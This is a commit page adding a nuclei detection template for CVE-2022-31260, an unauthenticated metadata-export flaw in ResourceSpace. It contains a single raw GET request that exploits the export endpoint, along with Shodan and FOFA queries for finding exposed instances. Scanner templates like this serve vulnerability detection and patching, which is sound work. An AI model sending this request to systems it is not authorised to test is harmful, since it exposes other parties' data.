Merge pull request #11154 from projectdiscovery/CVE-2022-31260

Create CVE-2022-31260.yaml
patch-14
Dhiyaneshwaran 2024-11-07 11:18:52 +05:30 committed by GitHub
commit f727233474
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2022-31260
info:
name: ResourceSpace - Metadata Export
author: ritikchaddha
severity: medium
description: |
In Montala ResourceSpace through 9.8 before r19636, csv_export_results_metadata.php allows attackers to export collection metadata via a non-NULL k value.
impact: |
Successful exploitation could lead to unauthorized access to sensitive metadata.
remediation: |
Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2022-31260.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2022-31260.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-31260
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2022-31260
cwe-id: CWE-306
epss-score: 0.00087
epss-percentile: 0.35924
cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: montala
product: resourcespace
shodan-query: title:"ResourceSpace"
fofa-query: title="ResourceSpace"
tags: cve,cve2022,resourcespace,misconfig
http:
- raw:
- |
GET /pages/csv_export_results_metadata.php?k=zulu&personaldata=0&allavailable=true&submit=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_any(body, "CSV-Export -", "pagename=\"csv_export_results_metadata")'
- 'status_code == 200'
condition: and